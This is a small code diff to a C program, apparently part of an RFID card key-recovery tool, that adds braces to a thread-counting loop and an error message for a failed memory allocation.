@@ -272,7 +272,9 @@ static uint64_t **unpredictable_nested(NtpKs1List *pNKL, uint32_t keyCounts[]) {
             pthread_cond_wait(&status_cond, &status_mutex);
             activeThreads = 0;
             for (int i = 0; i < NUM_THREADS; i++) {
-                if (thread_status[i]) activeThreads++;
+                if (thread_status[i]) {
+                    activeThreads++;
+                }
             }
         }
 
@@ -424,6 +426,7 @@ int main(int argc, char *const argv[]) {
         uint32_t nttest = prng_successor(1, 16); // a first valid nonce
         pNtData->pNK = (NtpKs1 *)calloc(8192, sizeof(NtpKs1)); // 2**16 filtered with 3 parity bits => 2**13
         if (pNtData->pNK == NULL) {
+            printf("Failed to allocate memory\n");
             return 1;
         }
 
